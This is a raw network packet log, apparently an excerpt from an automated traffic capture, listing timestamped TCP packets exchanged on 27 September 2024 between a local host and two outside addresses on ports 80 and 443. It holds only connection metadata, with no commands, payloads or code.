                                                                                    Sep 27, 2024 00:15:13.821254969 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.821269035 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.821280956 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.821285963 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.821301937 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.821316957 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.821330070 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.821347952 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.822143078 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.822159052 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.822174072 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.822187901 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.822191000 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.822225094 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.822243929 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.822253942 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.822278023 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.867680073 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.901782036 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.901819944 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.901834011 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.901876926 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.901973009 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.901988983 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.902004957 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.902021885 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.902024031 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.902055025 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.902426958 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.902445078 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.902460098 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.902467966 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.902477026 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.902488947 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.902532101 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.903023005 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.903038979 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.903053999 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.903069973 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.903075933 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.903088093 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.903106928 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.903115034 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.903129101 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.903666019 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.903681993 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.903700113 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.903708935 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.903742075 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.903915882 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.904031038 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.904046059 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.904061079 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.904074907 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.904082060 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.904090881 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.904105902 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.904105902 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.904135942 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.904912949 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.904930115 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.904943943 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.904958963 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.904973030 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.904988050 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.904995918 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.905004025 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.905009985 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.905019999 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.905047894 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.905792952 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.905807972 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.905822992 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.905838013 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.905853033 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.905858040 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.905870914 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.905883074 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.905886889 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.905899048 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.905903101 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.905916929 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.905926943 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.905958891 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.906675100 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.906691074 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.906706095 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.906721115 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.906734943 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.906745911 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.906749010 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.906773090 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.906774998 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.906790018 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.906791925 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.906832933 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.907463074 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.907545090 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.907562017 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.907587051 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.907744884 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.907758951 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.907773972 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.907788992 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.907823086 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.908175945 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.908190966 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.908206940 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.908220053 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.908229113 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.908236027 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.908251047 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.908267021 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.908274889 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.908283949 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.908298969 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.908299923 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.908315897 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.908327103 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.908345938 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.909041882 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.909056902 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.909071922 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.909085989 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.909090042 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.909095049 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.909110069 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.909123898 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.909125090 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.909141064 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.909148932 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.909157991 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.909173965 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.909178019 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.909194946 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.909946918 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.909961939 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.909976959 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.909991026 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.910003901 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.910006046 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.910020113 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.910022974 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.910037994 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.910047054 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.910054922 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.910069942 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.910079002 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.910090923 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.910105944 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.910121918 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.910144091 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.910866976 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.910882950 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.910897017 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.910912037 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.910927057 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.910932064 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.910943031 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.910948038 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.910959959 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.910979033 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.910985947 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.910995007 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.911010981 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.911032915 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.911056995 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.911797047 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.911813021 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.911834002 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.911849022 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.911855936 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.911864042 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.911878109 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.911890984 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.911902905 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.911906004 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.911920071 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.911921978 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.911945105 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.911952972 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.911992073 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.912628889 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.912643909 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.912658930 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.912672997 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.912688971 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.912691116 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.912729025 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.935854912 CEST44349776188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.935923100 CEST49776443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:13.937731981 CEST49776443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:13.937742949 CEST44349776188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.937988043 CEST44349776188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.939691067 CEST49776443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:13.939691067 CEST49776443192.168.2.4188.114.96.3
                                                                                    Sep 27, 2024 00:15:13.939758062 CEST44349776188.114.96.3192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.990066051 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.990094900 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.990108967 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.990156889 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.990206003 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.990221024 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.990237951 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.990252972 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.990262985 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.990279913 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.990303993 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.990318060 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.990334034 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.990348101 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.990355015 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.990380049 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.990576982 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.990592957 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.990617037 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.990636110 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.990648985 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.990660906 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.990664959 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.990699053 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.991182089 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.991198063 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.991219997 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.991235018 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.991250038 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.991257906 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.991266966 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.991276026 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.991281986 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.991298914 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.991306067 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.991313934 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.991344929 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.992152929 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.992167950 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.992182970 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.992197990 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.992208958 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.992216110 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.992227077 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.992232084 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.992248058 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.992258072 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.992264032 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.992280006 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.992294073 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.992320061 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.992342949 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.993065119 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.993081093 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.993096113 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.993113041 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.993119001 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.993129015 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.993138075 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.993146896 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.993160009 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.993171930 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.993176937 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.993195057 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.993200064 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.993211031 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.993226051 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.993237972 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.993263960 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.993921041 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.993937016 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.993952036 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.993967056 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.993989944 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.994018078 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.994364023 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.994379044 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.994393110 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.994407892 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.994416952 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.994425058 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.994441032 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.994457006 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.994460106 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.994472027 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.994486094 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.994488955 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.994504929 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.994513035 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.994520903 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.994543076 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.994565964 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.994585037 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.995259047 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.995274067 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.995289087 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.995305061 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.995320082 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.995342016 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.995347023 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.995356083 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.995364904 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.995373011 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.995379925 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.995395899 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.995409012 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.995424032 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.995439053 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.995495081 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.996193886 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.996211052 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.996226072 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.996237993 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.996243000 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.996258020 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.996263027 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.996278048 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.996294022 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.996310949 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.996310949 CEST4977480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:13.996326923 CEST8049774147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.996330023 CEST4977480192.168.2.4147.45.44.104
